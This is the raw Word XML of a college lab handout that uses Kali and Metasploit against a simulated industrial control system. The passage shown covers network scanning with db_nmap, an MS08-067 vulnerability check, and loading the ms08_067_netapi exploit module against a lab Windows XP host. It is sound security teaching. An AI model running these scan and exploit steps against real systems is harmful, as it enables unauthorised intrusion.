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CCBD26" w14:textId="46A690B6" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Lab 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B8881" w14:textId="7F0A7725" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Scenario Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F60736A" w14:textId="43DE1712" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:r>
        <w:t xml:space="preserve">The industrial control system (ICS) used in this scenario simulates an environment that might be used to cool industrial equipment. The ICS is made up of five systems. The first system contains a tank, tank level sensor and a water pump. The second system is a programmable logic controller (PLC) which controls the water pump based on the level of water found in the attached tank. The third system is an Open Platform Communications (OPC) server which accesses and modifies data found on the PLC. The fourth system is running Human Machine Interface (HMI) software which communicates with the OPC server to provide a human system operator with system statistics and control. The final system in the ICS is a security appliance that provides routing and firewall services for all systems. This scenario also make use of a system running Kali Linux. In this lab the virtual network switch is configured so that the Kail system receives all data transmitted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2737CDAC" w14:textId="20C8BC55" w:rsidR="00A90718" w:rsidRDefault="00A90718" w:rsidP="00D955E9">
      <w:r>
        <w:object w:dxaOrig="12386" w:dyaOrig="5717" w14:anchorId="22DA0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3in" o:ole="">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1782803699" r:id="rId9"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E04B5B" w14:textId="1969BC2E" w:rsidR="00E95505" w:rsidRDefault="00B15010" w:rsidP="00D955E9">
      <w:r w:rsidRPr="00B15010">
        <w:t>In this lab students will use Metasploit to create a network map, confirm a system vulnerability then use that vulnerability to exploit a system. While doing this, students will learn to perform basic module and payload searches in Metasploit and how to use the built-in help functionality. Students will also learn how configure and use a database to store Metasploit data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B813C87" w14:textId="77777777" w:rsidR="00C1794C" w:rsidRDefault="00D955E9" w:rsidP="003216CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E01989" w14:textId="052D0764" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="003216CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Install Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBAFE10" w14:textId="6D408DC2" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:r>
        <w:t>In this part of the lab you are going to install and configure the systems needed to complete the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFDBE4" w14:textId="77777777" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If necessary, install the free Oracle VirtualBox Manager software on your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D03B8D6" w14:textId="7049CD9A" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download, and if necessary, extract, the lab image ICS-VirtualBox.ova found at </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00D955E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.nl.northweststate.edu/CAMO/software/VirtualMachine/VirtualBox/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6A71C" w14:textId="77777777" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Start the Oracle VM VirtualBox program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD5ADF1" w14:textId="77777777" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Import the ICS-VirtualBox.ova lab image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737EEF68" w14:textId="77777777" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00D955E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After the import has completed access the Settings for the Security Appliance virtual machine and change its configuration so that it is bridged to the network device in your host computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3046DB37" w14:textId="77777777" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00572771">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Power on the systems in the following order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60946B42" w14:textId="7DF4B814" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00CB686D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Security Appliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E3B132" w14:textId="7324B4F1" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00CB686D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sensor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1211AC6D" w14:textId="0CFC1026" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00CB686D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PLC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B107C3B" w14:textId="1057A07A" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00CB686D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527ACAD5" w14:textId="1275C529" w:rsidR="00D955E9" w:rsidRDefault="00D955E9" w:rsidP="00CB686D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2216FF02" w14:textId="5FBDF7C3" w:rsidR="00001C1C" w:rsidRDefault="00D955E9" w:rsidP="00CB686D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD62B5" w14:textId="77777777" w:rsidR="00C1794C" w:rsidRDefault="00001C1C" w:rsidP="003216CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173FA7A4" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Configure the Database Connection and Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000EF641" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:r>
        <w:t>In this part of the lab you are going to configure a database server, configure Metasploit to connect to the database then start Metasploit using the msfconsole command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5909CD84" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access the Kali system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E19BE" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At the login screen enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB01C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the Enter your username field and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB01C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the Enter your password field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE7EDD" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click the Log In button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09993968" w14:textId="77777777" w:rsidR="003314A9" w:rsidRDefault="003314A9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5D341" w14:textId="563C01DA" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Open a terminal (command prompt) window by clicking the Terminal Emulator button found at the upper left hand corner of the window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F934236" w14:textId="0EF26C81" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05395607" wp14:editId="09F7CB79">
            <wp:extent cx="5029200" cy="3908376"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18485525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552550" name="Picture 1848552550"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="3908376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E63ED4" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB01C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo systemctl enable --now postgresql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to start the PostgreSQL database and configure it to start automatically if the system is restarted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005192C" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If when using sudo, you are prompted to authenticate type in the password </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB01C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> followed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB01C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;ENTER&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA34B67" w14:textId="7D2ED13B" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB01C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo msfdb init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to perform one time configuration changes which initialize the database and configure it to connect with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990A4E2" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4975">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to start Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D123A1B" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After Metasploit starts, type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4975">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db_status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to verify the database to Metasploit connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C0D01" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00CB01C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4975">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>workspace -a metasploit_lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to create a database connection to store the activities of this lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639BA81E" w14:textId="77777777" w:rsidR="00CB01C4" w:rsidRDefault="00CB01C4" w:rsidP="00AD4975">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you exit and restart Metasploit you can type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4975">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>workspace metasploit_lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to restore the metasploit_lab workspace's settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA60EE" w14:textId="77777777" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC576A9" w14:textId="77777777" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Map the Network and Find a Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B37D8A" w14:textId="77777777" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:r>
        <w:t>In this part of the lab you will use the nmap functionality built into Metasploit to map the network and find a system vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E41AC9" w14:textId="77777777" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A"/>
    <w:p w14:paraId="26E44A0B" w14:textId="186D17A0" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000A390A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db_nmap -O 10.0.255.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to create a network map showing hosts and the operating system they are running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9443E" w14:textId="67D369FD" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NOTE: The switch -O is a capital letter O and not the number 0!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBBCA80" w14:textId="0B8D555A" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After the scan has completed, type the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000A390A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view the results of the network map then note that several systems are running the operating system Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EB0261" w14:textId="12A522E4" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="643834EE" wp14:editId="216DC78E">
            <wp:extent cx="5029200" cy="1236882"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2026409362" name="Picture 2"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409362" name="Picture 2" descr="A screenshot of a computer program&#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029200" cy="1236882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E547162" w14:textId="09F63937" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Take a screen shot that shows the entire Kali window and paste it into the </w:t>
      </w:r>
      <w:r>
        <w:t>lab form</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86C122" w14:textId="78069108" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF6E2BC" wp14:editId="6B3A84D8">
            <wp:extent cx="5029200" cy="4180254"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1660008417"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008417" name="Picture 3" descr="A screenshot of a computer&#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029200" cy="4180254"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E9120" w14:textId="0B907AB2" w:rsidR="000A390A" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Take a minute or two to do some quick web research on the windows xp netapi vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43A40A" w14:textId="77777777" w:rsidR="000A390A" w:rsidRDefault="000A390A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A73A35" w14:textId="2754CA18" w:rsidR="00EB1387" w:rsidRDefault="000A390A" w:rsidP="000A390A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Verify that at least one of the discovered Windows XP systems is vulnerable to the ms08-067 vulnerability by typing the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3710E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db_nmap -Pn --script smb-vuln-ms08-067.nse 10.0.255.101</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2D3821" w14:textId="1553E813" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EFAD0A2" wp14:editId="2DAEB045">
            <wp:extent cx="5029200" cy="1229897"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="338835798" name="Picture 4" descr="A computer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835798" name="Picture 4" descr="A computer screen with white tex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029200" cy="1229897"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B9458" w14:textId="77777777" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Part 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6A6EB" w14:textId="77777777" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Find, Load and Configure a Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE4A39" w14:textId="77777777" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:r>
        <w:t>In this part of the lab you will find a module targeting the vulnerability found in the last section then load and configure the module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D226713" w14:textId="1E0D3F5C" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Determine if Metasploit contains an exploit for the netapi vulnerability by typing the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3710E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>search ms08-067</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD92D67" w14:textId="006AF15B" w:rsidR="00C3710E" w:rsidRDefault="00C3710E" w:rsidP="00C3710E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Load the exploit module by typing the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3710E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
